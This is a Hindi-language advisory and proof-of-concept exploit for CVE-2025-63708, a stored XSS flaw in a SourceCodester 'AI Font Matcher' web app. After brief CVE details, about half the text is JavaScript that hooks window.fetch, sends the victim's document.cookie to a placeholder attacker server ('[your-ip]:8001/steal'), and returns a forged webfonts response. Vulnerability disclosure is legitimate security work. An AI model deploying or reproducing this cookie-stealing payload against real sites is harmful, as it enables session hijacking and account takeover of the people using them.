
CVE-2025-63708 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, AI Font Matcher में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (stored XSS) कमजोरी। यह वेबफ़ॉन्ट्स फ़ेच प्रतिक्रियाओं में अनसैनिटाइज़्ड फ़ॉन्ट फ़ैमिली नामों के माध्यम से सत्र कुकी चोरी का प्रदर्शन करता है।
CVE ID: CVE-2025-63708
निर्धारित तिथि: 11-12-2025
समस्या प्रकार: CWE-79 (क्रॉस-साइट स्क्रिप्टिंग)
प्रभावित उत्पाद: "AI Font Matcher" (पोस्ट दिनांक 2025-10-10, nid=18425)
उत्पाद पृष्ठ: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
खोज तिथि: 2025-10-11
शोधकर्ता: Dylan Davis
एप्लिकेशन webfonts फ़ेच से डेटा को फ़ॉन्ट परिवार नामों को सैनिटाइज़ किए बिना संसाधित करता है। उस प्रतिक्रिया को नियंत्रित या इंटरसेप्ट करने वाला हमलावर ऐसा जावास्क्रिप्ट इंजेक्ट कर सकता है जो पृष्ठ संदर्भ में निष्पादित होता है, जिससे सत्र कुकी चोरी और खाता अधिग्रहण संभव होता है।
यह PoC window.fetch को हुक करके और नियंत्रित वेब फ़ॉन्ट पेलोड लौटाकर कोड निष्पादन प्रदर्शित करता है।
poc.js लोड करें)।webfonts फ़ेच करता है; alert(1) दिखता है।window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
const url = (typeof input === 'string') ? input : input?.url;
if (url && url.includes('webfonts')) {
// Exfiltrate cookie to your server
fetch('http://[your-ip]:8001/steal?cookie=' +
encodeURIComponent(document.cookie))
.catch(e => console.log('Exfil failed:', e));
return new Response(JSON.stringify({
kind: "webfonts#webfontList",
items: [{ family: "Playfair Display", category: "serif" }]
}), {
status: 200,
headers: {'Content-Type': 'application/json'}
});
}
return window.__origFetch.apply(this, arguments);
};